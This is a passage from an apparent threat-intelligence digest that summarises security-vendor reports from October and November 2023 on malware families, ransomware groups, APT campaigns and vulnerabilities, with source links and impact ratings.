- Researchers at Trend Micro have examined a phishing campaign that uses malicious emails linking to a file-sharing service. A second link in the email takes users to a PDF document containing a further link intended to capture session cookies and login credentials.
—
- Intel Source:
- Crowdstrike
- Intel Name:
- IMPERIAL_KITTEN_Deploys_Novel_Malware_Families_in_Middle_East_Focused_Operations
- Date of Scan:
- 2023-11-10
- Impact:
- MEDIUM
- Summary:
- The CrowdStrike blog describes IMPERIAL KITTEN, an Iran-nexus adversary with ties to the Islamic Revolutionary Guard Corps, deploying novel malware families in cyberattacks targeting the Middle East, specifically transportation, logistics, and technology sectors in October 2023. The group uses tactics like public scanning tools, exploits, and stolen VPN credentials for access; employs PAExec and credential theft for lateral movement; and utilizes custom malware for data exfiltration. Malware like IMAPLoader, StandardKeyboard, and a Python reverse shell delivered via Excel documents are highlighted. IMPERIAL KITTEN’s activity is characterized by social engineering with a focus on Israeli organizations, and the blog provides a detailed analysis of the group’s tooling and methods.
Source:
https://www.crowdstrike.com/blog/imperial-kitten-deploys-novel-malware-families/
—
- Intel Source:
- Unit 42
- Intel Name:
- EleKtra_Leak_Tracking_Malicious_Operations_of_Exposed_IAM_Keys
- Date of Scan:
- 2023-11-10
- Impact:
- LOW
- Summary:
- Unit 42 researchers have uncovered an active campaign named EleKtra-Leak which targets exposed IAM credentials within public GitHub repositories. The campaign, believed to be ongoing for at least two years, involves creating AWS EC2 instances for cryptojacking operations. The threat actors can exploit exposed credentials within five minutes of their appearance on GitHub.
Source:
https://unit42.paloaltonetworks.com/malicious-operations-of-exposed-iam-keys-cryptojacking/
—
- Intel Source:
- Deep Instinct
- Intel Name:
- MuddyC2Go_Latest_C2_Framework_Used_by_Iranian_APT_MuddyWater_Spotted_in_Israel
- Date of Scan:
- 2023-11-10
- Impact:
- MEDIUM
- Summary:
- The Deep Instinct Threat Research team has discovered a new Command and Control (C2) framework named MuddyC2Go, believed to be used by the Iranian APT group MuddyWater since at least 2020. This framework, written in Go, is a shift from their previous tool, PhonyC2. MuddyWater’s typical tactics involve spear-phishing to deliver malware. Recent changes include password-protected archives to evade detection and executables that connect directly to the C2, bypassing the need for manual script execution. Instances of MuddyC2Go usage were observed in various Middle Eastern countries with specific targeting of Israeli entities. Attribution to MuddyWater is based on past activities, IP address analysis, and unique URL patterns, with known servers hosted by a VPS provider associated with malicious activities. Deep Instinct recommends disabling PowerShell if not needed or monitoring its activity closely due to MuddyWater’s reliance on PowerShell payloads.
—
- Intel Source:
- SysAid
- Intel Name:
- SysAid_On_Prem_Software_CVE_2023_47246_Vulnerability
- Date of Scan:
- 2023-11-10
- Impact:
- LOW
- Summary:
- A vulnerability was identified in SysAid’s on-premises software, leading to an immediate response and communication with customers to implement a mitigation solution. The zero-day vulnerability allowed the Lace Tempest group to execute code and deploy the GraceWire trojan via a WebShell. Users are urged to update SysAid systems to version 23.3.36 and perform a network compromise assessment. The attack involved path traversal, PowerShell scripts to launch malware and erase evidence, and the use of a CobaltStrike agent.
Source:
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_LockBit_Ransomware_and_Vidar_Infostealer
- Date of Scan:
- 2023-11-09
- Impact:
- MEDIUM
- Summary:
- One of the primary ways the LockBit ransomware spreads is through the use of resume impersonation. In February of this year, information on this was posted on the ASEC Blog. It has been verified that the most recent deployments also contain an Infostealer, as opposed to earlier ones that simply contained the LockBit ransomware.
—
- Intel Source:
- Twitter, GitHub, Abuse.ch, Palo Alto
- Intel Name:
- The_Pikabot_malware_activity
- Date of Scan:
- 2023-11-09
- Impact:
- MEDIUM
- Summary:
- Palo Alto Unit 42 researchers, like many others, observed Pikabot malware being spread by TA577 throughout this week, and they and others collected indicators of compromise (IOCs) from the last couple of days of infections. TA577 is a threat actor acting as an initial access broker (IAB) for ransomware and targeting Western organisations; the campaign uses URLs leading to a password-protected ZIP archive (password H17) containing a JavaScript file that uses cURL to run Pikabot.
Source:
https://twitter.com/threatinsight/status/1721983400611864640
https://bazaar.abuse.ch/browse/signature/pikabot/
https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2023-11-02-IOCs-for-TA577-Pikabot-activity.txt
https://github.com/threatlabz/iocs/blob/main/pikabot/c2s_20231102.txt
https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_02.11.2023.txt
https://www.agid.gov.it/it/agenzia/stampa-e-comunicazione/notizie/2023/10/31/attenzione-al-malware-pikabot-false-mail-comunicano-enti-lavvenuta-federazione-spid
—
- Intel Source:
- SentinelOne
- Intel Name:
- An_Infostealer_Powered_by_ChatGPT_Aims_at_Cloud_Platforms
- Date of Scan:
- 2023-11-09
- Impact:
- LOW
- Summary:
- Researchers at SentinelLabs have discovered a brand-new infostealer and hacking tool named “Predator AI” that targets cloud services and is based on Python. To improve the tool’s usability and provide a unified text-driven interface for various functions, the Predator AI developer incorporated a ChatGPT-driven class into the Python script.
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Adversary_Using_Fake_PC_News_Website_to_Spread_Information_Stealers
- Date of Scan:
- 2023-11-09
- Impact:
- LOW
- Summary:
- Researchers at Malwarebytes have discovered that a threat actor is replicating WindowsReport.com, a reputable Windows news page, in order to propagate a malicious installer for CPU-Z, a well-known processor tool.
—
- Intel Source:
- ASEC
- Intel Name:
- Notification_Regarding_Phobos_Ransomware
- Date of Scan:
- 2023-11-09
- Impact:
- LOW
- Summary:
- Researchers from ASEC have found that the Phobos ransomware is still operational. One variation called Phobos is well-known for having operational and technological parallels to both the Dharma and CrySis malware. These ransomware strains usually use insecure security features on Remote Desktop Protocol (RDP) services that are open to the outside world as attack vectors. Administrators are recommended to exercise caution, since ransomware dissemination frequently uses these susceptible RDPs as initial ports of entry.
—
- Intel Source:
- Seqrite
- Intel Name:
- A_Look_at_Its_Function_in_Distribution_of_Malware
- Date of Scan:
- 2023-11-09
- Impact:
- LOW
- Summary:
- Researchers from Seqrite have seen the use of a batloader to deliver Agent Tesla. It is not exclusive to this particular malware strain, though: it has also been regularly noted that this batloader aids in the injection of other malware families. Even though the code may differ slightly, the fundamental process is very consistent.
—
- Intel Source:
- Mandiant
- Intel Name:
- Ukraine_Power_Grid_Downed_by_Sandworms
- Date of Scan:
- 2023-11-09
- Impact:
- MEDIUM
- Summary:
- The notorious Sandworm advanced persistent threat (APT) organization from Russia employed living-off-the-land (LotL) tactics to cause a power outage in a Ukrainian city in October 2022, which was followed by a flurry of missile strikes.
Source:
https://www.mandiant.com/resources/blog/sandworm-disrupts-power-ukraine-operational-technology
—
- Intel Source:
- Checkmarx
- Intel Name:
- BlazeStealer_Malware_Found_in_Python_Packages_on_PyPI
- Date of Scan:
- 2023-11-09
- Impact:
- LOW
- Summary:
- The ultimate goal of a fresh batch of malicious Python packages that have made their way into the Python Package Index (PyPI) repository is to steal private data from developer systems that have been breached. The packages contain malware known as BlazeStealer, while appearing to be harmless obfuscation tools.
Source:
https://checkmarx.com/blog/python-obfuscation-traps/
—
- Intel Source:
- Palo Alto
- Intel Name:
- Chinese_APT_Attacks_Government_of_Cambodia
- Date of Scan:
- 2023-11-09
- Impact:
- MEDIUM
- Summary:
- Researchers from Palo Alto have discovered harmful Chinese APT infrastructure that poses as cloud backup services. They saw network connections mostly coming from Cambodia while keeping an eye on telemetry linked to two well-known Chinese APT groups. These connections included inbound connections coming from at least 24 government entities in Cambodia.
Source:
https://unit42.paloaltonetworks.com/chinese-apt-linked-to-cambodia-government-attacks/
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Project_File_Example_for_Phishing_Campaign
- Date of Scan:
- 2023-11-09
- Impact:
- LOW
- Summary:
- ISC.SANS researchers have discovered a fascinating file on VT. Because the file included a reference to one of their customers’ domains, it set off one of their hunting rules. They looked at the “EwoExcel (1).mmp” file. Though it was made in 2022, the file was only just uploaded to VT. These kinds of files are handled using a program known as “GammaDyne.” The program can open the file and extract its secrets. It includes information on a well-known phishing campaign project.
Source:
https://isc.sans.edu/diary/Example+of+Phishing+Campaign+Project+File/30384
—
- Intel Source:
- Krebsonsecurity
- Intel Name:
- SWAT_USA_Drop_Service_Exposed
- Date of Scan:
- 2023-11-08
- Impact:
- LOW
- Summary:
- Researchers from KrebsonSecurity have identified SWAT USA Drop Service. Based in Russia, this organization employs more than 1,200 individuals across the United States to reship stolen merchandise acquired with pilfered credit card information.
Source:
https://krebsonsecurity.com/2023/11/russian-reshipping-service-swat-usa-drop-exposed/
—
- Intel Source:
- SOC Radar
- Intel Name:
- New_Gootloader_Variant_GootBot
- Date of Scan:
- 2023-11-08
- Impact:
- LOW
- Summary:
- SOCRadar researchers have discovered a new Gootloader malware version called “GootBot,” which is utilized in SEO poisoning campaigns. This version adds capabilities that make it harder for enterprises to identify or stop threat actors from moving laterally within compromised systems.
Source:
https://socradar.io/new-gootloader-variant-gootbot-changes-the-game-in-malware-tactics/
—
- Intel Source:
- Esentire
- Intel Name:
- An_infection_by_the_NetWire_RAT
- Date of Scan:
- 2023-11-08
- Impact:
- LOW
- Summary:
- In September 2023, eSentire threat researchers discovered and prevented an infection by the NetWire RAT. NetWire is a publicly available remote administration tool which has password-stealing and keylogging capabilities.
Source:
https://www.esentire.com/blog/netwire-rat-the-stealthy-invasion-via-frenchy-shellcode
—
- Intel Source:
- Uptycs
- Intel Name:
- From_Combating_ISIS_to_Potentially_Using_RaaS_to_Target_Israel
- Date of Scan:
- 2023-11-08
- Impact:
- LOW
- Summary:
- GhostLocker, a novel ransomware-as-a-service (RaaS) infrastructure, was disclosed by the hacking organization GhostSec. Through a dedicated Telegram channel, they offer consumers interested in purchasing this service extensive guidance. GhostSec is currently concentrating its attacks on Israel. This action is an unexpected divergence from their prior endeavors and declared goals.
Source:
https://www.uptycs.com/blog/ghostlocker-ransomware-ghostsec
—
- Intel Source:
- Cyfirma
- Intel Name:
- A_new_threat_the_Millenium_RAT_details
- Date of Scan:
- 2023-11-08
- Impact:
- LOW
- Summary:
- The Cyfirma team observed a new RAT on GitHub, available for purchase. The analysts shared their in-depth investigation report of the Millenium-RAT, version 2.4, a Win32 executable built on .NET. At the same time, the RAT is actively under development, with a new version, 2.5, just released.
Source:
https://www.cyfirma.com/outofband/unveiling-a-new-threat-the-millenium-rat/
—
- Intel Source:
- Esentire
- Intel Name:
- A_Journey_From_DarkGate_to_DanaBot
- Date of Scan:
- 2023-11-08
- Impact:
- LOW
- Summary:
- Early in June 2023, a Russian-speaking hacking site first advertised the sale of DarkGate, a loader developed in Borland Delphi. According to the loader developer, they started working on the project in 2017. Among the many functions offered by DarkGate are hVNC, hAnyDesk, rootkit, reverse proxy, keylogger, crypto mining, credentials theft, and remote desktop. The cost of the loader is $1,000 for a single use and $15,000 for recurring use.
Source:
https://www.esentire.com/blog/from-darkgate-to-danabot
—
- Intel Source:
- Jamf, Security Week
- Intel Name:
- New_macOS_malware_used_by_North_Korean_hackers
- Date of Scan:
- 2023-11-08
- Impact:
- MEDIUM
- Summary:
- A new macOS malware, suspected of being used by North Korean hackers to target crypto exchanges, was reported by security firm Jamf. The group responsible for the malware is suspected to be the same group behind the recently reported KandyKorn malware.
Source:
https://www.jamf.com/blog/bluenoroff-strikes-again-with-new-macos-malware/
https://www.securityweek.com/new-macos-malware-linked-to-north-korean-hackers/
—
- Intel Source:
- nccgroup
- Intel Name:
- A_deeper_dive_into_the_D0nut_extortion_group
- Date of Scan:
- 2023-11-08
- Impact:
- LOW
- Summary:
- NCC Group took a deeper look at the D0nut extortion group. The D0nut extortion group was first seen last year breaking into networks and demanding money in return for not leaking stolen data. There are also suspected ties between D0nut affiliates and both the Hive and Ragnar Locker ransomware operations.
Source:
https://research.nccgroup.com/2023/11/06/d0nut-encrypt-me-i-have-a-wife-and-no-backups/
—
- Intel Source:
- Cyfirma
- Intel Name:
- Good_Day_ransomware_of_the_week
- Date of Scan:
- 2023-11-07
- Impact:
- MEDIUM
- Summary:
- CYFIRMA researchers have discovered ransomware known as Good Day ransomware while monitoring various underground forums as part of their Threat Discovery Process.
Source:
https://www.cyfirma.com/news/weekly-intelligence-report-03-nov-2023/
—
- Intel Source:
- Seqrite
- Intel Name:
- SideCopy_s_multi_platform_attacks
- Date of Scan:
- 2023-11-07
- Impact:
- MEDIUM
- Summary:
- SEQRITE Labs APT-Team has observed multiple campaigns of the APT SideCopy attacking Indian government and defense entities over the last couple of months. The threat group is now exploiting the recent WinRAR vulnerability CVE-2023-38831 to deploy AllaKore RAT, DRat and additional payloads.
—
- Intel Source:
- HC3
- Intel Name:
- An_Overview_of_BlackSuit_Ransomware
- Date of Scan:
- 2023-11-07
- Impact:
- MEDIUM
- Summary:
- Given its striking resemblance to the Royal ransomware family, BlackSuit, a relatively new ransomware group and strain, is expected to pose a serious danger to the Healthcare and Public Health (HPH) industry. Sensitive data on a vulnerable network is stolen and encrypted by BlackSuit utilizing a double extortion technique. It has only been used specifically in a few instances thus far.
Source:
https://www.hhs.gov/sites/default/files/blacksuit-ransomware-analyst-note-tlpclear.pdf
—
- Intel Source:
- PaloAlto
- Intel Name:
- Agonizing_Serpens_attacks_on_the_Israeli_organizations
- Date of Scan:
- 2023-11-07
- Impact:
- MEDIUM
- Summary:
- Unit 42 researchers have analyzed recent attacks last month which targeted the education and technology sectors in Israel. The attacks attempted to steal sensitive data, such as personally identifiable information (PII) and intellectual property. Unit 42’s investigation showed the perpetrators of the attacks are linked to an Iranian-backed APT group Unit 42 tracks as Agonizing Serpens (aka Agrius, BlackShadow, Pink Sandstorm, DEV-0022).
Source:
https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/
—
- Intel Source:
- VMware
- Intel Name:
- A_Jupyter_Infostealer_Update
- Date of Scan:
- 2023-11-07
- Impact:
- MEDIUM
- Summary:
- New Jupyter Infostealer iterations persist in developing, incorporating minor yet significant modifications to the malware creator’s methods. With this innovation, the attacker can more covertly compromise victims by avoiding detection and establishing persistence.
Source:
https://blogs.vmware.com/security/2023/11/jupyter-rising-an-update-on-jupyter-infostealer.html
—
- Intel Source:
- Cyble
- Intel Name:
- A_new_open_source_stealer_named_Trap_Stealer
- Date of Scan:
- 2023-11-07
- Impact:
- LOW
- Summary:
- Cyble researchers shared their deep insights about a new info stealer known as “Trap Stealer” – an open-source Python-based program. The developer of this stealer claims that it is designed to extract a wide range of sensitive data from compromised systems in just 6 seconds.
Source:
https://cyble.com/blog/new-open-source-trap-stealer-pilfers-data-in-just-6-seconds/
—
- Intel Source:
- Security Intelligence
- Intel Name:
- Hive0051s_Large_Scale_Malicious_Operations
- Date of Scan:
- 2023-11-07
- Impact:
- MEDIUM
- Summary:
- Last month, IBM X-Force started to see a huge spike in Hive0051’s activity with a new multi-channel approach of rapidly rotating C2 infrastructure, with at least 1,027 active infections and more than 327 unusual malicious domains observed in a 24-hour period.
Source:
https://securityintelligence.com/x-force/hive0051-malicious-operations-enabled-dns-fluxing/
—
- Intel Source:
- Intezer
- Intel Name:
- Malicious_PDF_files_analysis
- Date of Scan:
- 2023-11-07
- Impact:
- LOW
- Summary:
- Intezer analysts described in their article the PDF format and how it can be abused to deliver malware. They then showed how to identify and detect a malicious PDF file using open-source and free tools.
Source:
https://intezer.com/blog/incident-response/analyze-malicious-pdf-files/
—
- Intel Source:
- Aquasec
- Intel Name:
- Kinsing_Actors_Breach_Cloud_Environments_by_Using_New_Linux_Flaw
- Date of Scan:
- 2023-11-06
- Impact:
- LOW
- Summary:
- Aqua Nautilus researchers have effectively stopped Kinsing’s experimental forays into cloud environments. Through a basic yet common PHPUnit vulnerability exploit attack that is part of Kinsing’s continuous campaign, they discovered the threat actor’s manual attempts to exploit the Looney Tunables vulnerability (CVE-2023-4911).
Source:
https://blog.aquasec.com/loony-tunables-vulnerability-exploited-by-kinsing
—
- Intel Source:
- McAfee
- Intel Name:
- Revealing_the_AsyncRAT_New_Infection_Network
- Date of Scan:
- 2023-11-06
- Impact:
- LOW
- Summary:
- Researchers at McAfee have seen that a malicious HTML file is being used to spread a recent AsyncRAT campaign. VBScript (VBS), Windows Script File (WSF), PowerShell, and other file formats are used throughout this entire infection method to evade antivirus detection.
Source:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/unmasking-asyncrat-new-infection-chain/
—
- Intel Source:
- BitSight
- Intel Name:
- Exposing_Socks5Systemz
- Date of Scan:
- 2023-11-03
- Impact:
- LOW
- Summary:
- Researchers from Bitsight have discovered a proxy botnet that is being delivered using two loaders that threat actors commonly use to spread malware and construct botnets: PrivateLoader and Amadey. The malware known as a proxy bot has been dubbed Socks5Systemz, which is also the name of the special login window that is always present in all of the current C2 proxy bots.
—
- Intel Source:
- HC3
- Intel Name:
- Analyzing_the_8Base_Ransomware_Threat
- Date of Scan:
- 2023-11-03
- Impact:
- MEDIUM
- Summary:
- The “8Base Ransomware Threat Analysis – HC3 Analyst Note” is a report from the U.S. Department of Health and Human Services (HHS). It discusses the emerging threat posed by the 8Base ransomware gang, focusing on its recent activities in the Healthcare and Public Health (HPH) sector.
Source:
https://www.hhs.gov/sites/default/files/8base-ransomware-analyst-note.pdf
—
- Intel Source:
- Cyble
- Intel Name:
- New_Java_Based_Sayler_RAT_Targeting_Polish_Speaking_Users
- Date of Scan:
- 2023-11-03
- Impact:
- LOW
- Summary:
- Researchers from Cyble discovered a Java Archive (JAR) file on VirusTotal that had zero detections. After further investigation, they were able to identify the file as a Remote Access Trojan (RAT), which they named “Sayler.”
Source:
https://cyble.com/blog/new-java-based-sayler-rat-targets-polish-speaking-users/
—
- Intel Source:
- NCC Group
- Intel Name:
- A_Synopsis_of_Blisters_Malware
- Date of Scan:
- 2023-11-03
- Impact:
- LOW
- Summary:
- In the past, Blister, a loader with an integrated payload, was seen engaging in activities connected to Evil Corp. Researchers have also viewed it as a follow-up in SocGholish infections, in line with public reporting. Previously, they saw Blister mostly dropping Cobalt Strike beacons, but recent events indicate a change to Mythic agents, another red teaming framework.
—
- Intel Source:
- Netskope
- Intel Name:
- A_Novel_Loading_Method_Employed_by_New_DarkGate_Variant
- Date of Scan:
- 2023-11-03
- Impact:
- LOW
- Summary:
- Recently, a new DarkGate variant distributed via MSI that uses a loading technique based on the default shellcode stub of Cobalt Strike Beacon was discovered by Netskope Threat Labs. By comparing the results of their analysis with those of other researchers, they were able to conclude that this is a new variant of the DarkGate malware.
Source:
https://www.netskope.com/jp/blog/new-darkgate-variant-uses-a-new-loading-approach
—
- Intel Source:
- Ciberdefensa, ASEC
- Intel Name:
- An_Infostealer_actively_being_distributed
- Date of Scan:
- 2023-11-02
- Impact:
- MEDIUM
- Summary:
- This article warns against the malicious behavior of the LummaC2 infostealer, which is distributed by executing legitimate EXE files with malicious DLLs disguised as cracks and keygens. It provides IOC information, C2 information, and encourages readers to subscribe to AhnLab’s TIP platform for further analysis.
Source:
https://ciberdefensa.cat/archivos/28455
https://asec.ahnlab.com/en/58319/
—
- Intel Source:
- ASEC
- Intel Name:
- Malicious_HWP_documents_with_embedded_OLE_object
- Date of Scan:
- 2023-11-02
- Impact:
- LOW
- Summary:
- ASEC found malicious HWP documents embedded with OLE objects targeting individuals in specific sectors. The documents prompt users to click the OLE object, which contains a malicious URL. The second type of HWP document has a malicious script file embedded, which executes an additional script code from GitHub. When executed, files zz.bat and oz.txt are created, which contain PowerShell commands to download and execute data from GitHub.
—
- Intel Source:
- Deep Instinct
- Intel Name:
- Iran_Group_MuddyWater_Targeting_Israel
- Date of Scan:
- 2023-11-02
- Impact:
- MEDIUM
- Summary:
- A fresh spear-phishing campaign targeting two Israeli businesses has been connected to the Iranian nation-state actor MuddyWater. The campaign’s ultimate goal is to deliver Advanced Monitoring Agent, a genuine remote administration tool from N-able.
Source:
https://www.deepinstinct.com/blog/muddywater-en-able-spear-phishing-with-new-ttps
—
- Intel Source:
- PaloAlto
- Intel Name:
- The_upgraded_variant_of_Kazuar
- Date of Scan:
- 2023-11-02
- Impact:
- LOW
- Summary:
- Kazuar is a .NET backdoor used by Pensive Ursa as a second stage payload. It has robust code and string obfuscation techniques, a multithreaded model for enhanced performance, and a range of encryption schemes to protect its code from analysis and to conceal its data. It supports over 40 distinct commands, half of which were previously undocumented, and has anti-analysis functionalities, extensive system profiling capabilities, and is specifically targeted at cloud applications. Cortex XDR can detect and prevent the execution of Kazuar.
Source:
https://unit42.paloaltonetworks.com/pensive-ursa-uses-upgraded-kazuar-backdoor/
—
- Intel Source:
- Rapid7
- Intel Name:
- Ransomware_Group_HelloKitty_Exploiting_Apache_ActiveMQ_Vulnerability
- Date of Scan:
- 2023-11-02
- Impact:
- LOW
- Summary:
- Rapid7 researchers have issued a warning regarding the potential for remote code execution in the event that a recently discovered severe security hole in the Apache ActiveMQ open-source message broker service is exploited.
—
- Intel Source:
- Elastic
- Intel Name:
- The_DPRK_infects_blockchain_engineers_with_new_macOS_malware
- Date of Scan:
- 2023-11-01
- Impact:
- LOW
- Summary:
- The article describes the malicious code KANDYKORN used by the Lazarus Group to access and exfiltrate data from victims’ computers. It utilizes reflective loading and encrypted RC4 protocol to communicate with the C2 server. It also provides EQL queries, YARA rules, and observables related to the SUGARLOADER, HLOADER, and KANDYKORN payloads.
Source:
https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn
—
- Intel Source:
- Reversing Labs
- Intel Name:
- NuGet_expose_to_malicious_activities_by_threat_actors
- Date of Scan:
- 2023-11-01
- Impact:
- MEDIUM
- Summary:
Source:
https://www.reversinglabs.com/blog/iamreboot-malicious-nuget-packages-exploit-msbuild-loophole
—
- Intel Source:
- Palo Alto
- Intel Name:
- Monitoring_Malicious_Activities_Using_Revealed_IAM_Keys
- Date of Scan:
- 2023-11-01
- Impact:
- MEDIUM
- Summary:
- In an attempt to aid cryptojacking activities, a new ongoing campaign known as EleKtra-Leak is focusing on exposed identity and access management (IAM) credentials from Amazon Web Services (AWS) inside open GitHub projects.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- The_discovery_of_a_kill_switch_that_took_down_a_botnet
- Date of Scan:
- 2023-11-01
- Impact:
- LOW
- Summary:
Source:
https://www.welivesecurity.com/en/eset-research/who-killed-mozi-finally-putting-the-iot-zombie-botnet-in-its-grave/
—
- Intel Source:
- Fortinet
- Intel Name:
- Knight_Ransomware_activity
- Date of Scan:
- 2023-11-01
- Impact:
- MEDIUM
- Summary:
- This article provides information on the Knight ransomware dropper location, its infection vector, victimology, and data leak site. It also outlines Fortinet’s protections and Indicators of Compromise (IOCs), as well as its services to help organizations protect themselves from ransomware attacks, such as the FortiPhish Phishing Simulation Service and NSE 1 – Information Security Awareness training module. Additionally, it advises against paying a ransom and outlines Fortinet’s Emergency Incident Response Service, Incident Readiness Subscription Service, and FortiRecon Digital Risk Protection (DRP).
Source:
https://www.fortinet.com/blog/threat-research/ransomware-roundup-knight
—
- Intel Source:
- Talos
- Intel Name:
- The_estimate_of_cyber_attacks_cost
- Date of Scan:
- 2023-11-01
- Impact:
- LOW
- Summary:
- This article discusses the potential for estimates of cyber attack costs to create fear, uncertainty, and doubt (FUD) in the cybersecurity space. Instead of focusing on these estimates, the author suggests focusing on ways to get easy cybersecurity wins. It also provides an overview of the YoroTrooper threat actor, security headlines, upcoming events, and a list of the most prevalent malware files from Talos telemetry.
Source:
https://blog.talosintelligence.com/threat-source-newsletter-oct-26-2023/
—
- Intel Source:
- Checkpoint
- Intel Name:
- An_ongoing_Iranian_espionage_campaign_by_Scarred_Manticore
- Date of Scan:
- 2023-11-01
- Impact:
- LOW
- Summary:
- Scarred Manticore is an Iranian nation-state threat actor that deploys LIONTAIL, a backdoor, and other custom components to target government, telecommunications, military, and financial sectors in the Middle East. LIONTAIL utilizes the Windows HTTP Stack to register URL prefixes and receive requests, and uses XOR-based encryption to protect data. It also uses the WINTAPIX driver to inject shellcode into processes and execute .NET assemblies from memory.
—
- Intel Source:
- Security Joes
- Intel Name:
- BiBi_Linux_a_new_wiper
- Date of Scan:
- 2023-10-31
- Impact:
- MEDIUM
- Summary:
- Security Joes analysts conducted a forensic investigation and found what appears to be a new Linux wiper malware, which they track as BiBi-Linux Wiper. This malware is an x64 ELF executable, lacking obfuscation or protective measures. It allows attackers to specify target folders and can potentially destroy an entire operating system if run with root permissions.
Source:
https://www.securityjoes.com/post/bibi-linux-a-new-wiper-dropped-by-pro-hamas-hacktivist-group
—
- Intel Source:
- Proofpoint
- Intel Name:
- IcedID_Forked_Loader_Delivered_by_TA571
- Date of Scan:
- 2023-10-31
- Impact:
- LOW
- Summary:
- Researchers at Proofpoint have discovered that on October 11 and 18, 2023, TA571 delivered the Forked variant of IcedID in two campaigns. Each of the two campaigns consisted of more than 6,000 messages and reached more than 1,200 customers worldwide across numerous industries. The campaigns’ emails claimed to be responses to already-existing discussions, a technique known as thread hijacking. The emails contained 404 TDS URLs that led to the download of a password-protected zip file, with the password provided in the email. Before delivering the zip archive, the attack chain ran a number of checks to make sure the recipient was legitimate.
Source:
https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta571-delivers-icedid-forked-loader
—
- Intel Source:
- Sucuri
- Intel Name:
- Fake_Google_chrome_update_malware
- Date of Scan:
- 2023-10-30
- Impact:
- LOW
- Summary:
- Fake Google Chrome update malware, associated with SocGholish, tricks users into downloading a RAT. Attackers modify the official download page, and malicious JavaScript code triggers a malicious download when the “Update” button is clicked. The malware belongs to the Zgrat and Redline Stealer families. Website owners should patch plugins/themes, secure/harden WordPress, and keep backups to protect against this malware.
Source:
https://blog.sucuri.net/2023/10/fakeupdateru-chrome-update-infection-spreads-trojan-malware.html
—
- Intel Source:
- Zscaler
- Intel Name:
- A_Look_Back_at_AvosLocker
- Date of Scan:
- 2023-10-30
- Impact:
- LOW
- Summary:
- According to Zscaler analysts’ analysis, AvosLocker is a ransomware group that was operational up to May 2023, carrying out double extortion attacks. The organization used various ransomware strains to attack multiple operating systems.
Source:
https://www.zscaler.com/blogs/security-research/retrospective-avoslocker
—
- Intel Source:
- CERT SSI
- Intel Name:
- Numerous_Critical_Networks_Breached_by_Russian_State_Hackers
- Date of Scan:
- 2023-10-30
- Impact:
- MEDIUM
- Summary:
- Since the second part of 2021, the Russian hacking group APT28 (also known as “Strontium” or “Fancy Bear”) has been focusing on French government agencies, corporations, academic institutions, research centers, and think tanks. The attack group was recently connected to the exploitation of two vulnerabilities: CVE-2023-23397, a zero-day privilege elevation weakness in Microsoft Outlook, and CVE-2023-38831, a remote code execution vulnerability in WinRAR. The threat group is thought to be a part of Russia’s military intelligence service GRU.
Source:
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-009.pdf
—
- Intel Source:
- The DFIR Report
- Intel Name:
- Invasions_by_Netsupport_Result_in_Domain_Compromises
- Date of Scan:
- 2023-10-30
- Impact:
- LOW
- Summary:
- Researchers from the DFIR Report examined a January 2023 case in which a network was compromised using a NetSupport RAT. After that, a full domain breach was achieved through the usage of the RAT for persistence and command and control.
Source:
https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Dynamic_Search_Ads_Delivering_Malware
- Date of Scan:
- 2023-10-30
- Impact:
- LOW
- Summary:
- Researchers at Malwarebytes have examined another situation in which, bizarre as it may seem, malvertising is completely unintentional. This is the result of two distinct elements coming together: Google Dynamic Search Ads and a hijacked website.
—
- Intel Source:
- ASEC
- Intel Name:
- Remcos_RAT_Distribution_Clad_in_Payslip
- Date of Scan:
- 2023-10-30
- Impact:
- LOW
- Summary:
- Researchers from ASEC have uncovered instances where the Remcos remote control malware is distributed using emails that look like payslips.
—
- Intel Source:
- Elastic
- Intel Name:
- Hackers_Infect_Windows_Systems_with_MSIX_App_Packages
- Date of Scan:
- 2023-10-30
- Impact:
- MEDIUM
- Summary:
- A fresh cyberattack operation has been noticed that distributes a unique malware loader known as GHOSTPULSE by employing phony MSIX Windows app package files for widely used programs like Google Chrome, Microsoft Edge, Brave, Grammarly, and Cisco Webex.
Source:
https://www.elastic.co/security-labs/ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks
—
- Intel Source:
- Securelist
- Intel Name:
- Introducing_Lazarus_New_Campaign
- Date of Scan:
- 2023-10-27
- Impact:
- MEDIUM
- Summary:
- Researchers at Securelist have found that the company that created the compromised software has already been repeatedly hacked by Lazarus. This repeated breach indicated a persistent and determined threat actor that continued to target additional software developers while exploiting weaknesses in the company’s software, most likely with the intention of obtaining important source code or interfering with the software supply chain.
Source:
https://securelist.com/unveiling-lazarus-new-campaign/110888/
—
- Intel Source:
- Cyble
- Intel Name:
- The_Higaisa_APT_group_targeting_Chinese_users
- Date of Scan:
- 2023-10-27
- Impact:
- LOW
- Summary:
- Cyble researchers have observed a new APT campaign that tricks unsuspecting victims through phishing and copies well-known computer applications. This time, a phishing website was observed posing as OpenVPN software aimed at Chinese users and serving as a host to deliver the malicious payload.
Source:
https://cyble.com/blog/higaisa-apt-resurfaces-via-phishing-website-targeting-chinese-users/
—
- Intel Source:
- Securelist
- Intel Name:
- StripedFly_exploit
- Date of Scan:
- 2023-10-27
- Impact:
- LOW
- Summary:
- Securelist observed and detailed another cryptocurrency miner. The StripedFly exploit is masked behind a modular framework that supports both Linux and Windows. It comes with a built-in TOR network tunnel for communication with command servers, along with update and delivery functionality through trusted services such as GitLab, GitHub, and Bitbucket, all using custom encrypted archives.
Source:
https://securelist.com/stripedfly-perennially-flying-under-the-radar/110903/
—
- Intel Source:
- Zscaler
- Intel Name:
- The_Mystic_Stealer_Returns
- Date of Scan:
- 2023-10-26
- Impact:
- LOW
- Summary:
- Early in 2023, the downloader and information stealer known as Mystic Stealer made its appearance. A multitude of web browsers and cryptocurrency wallet applications are used by the spyware to gather data.
—
- Intel Source:
- PWC
- Intel Name:
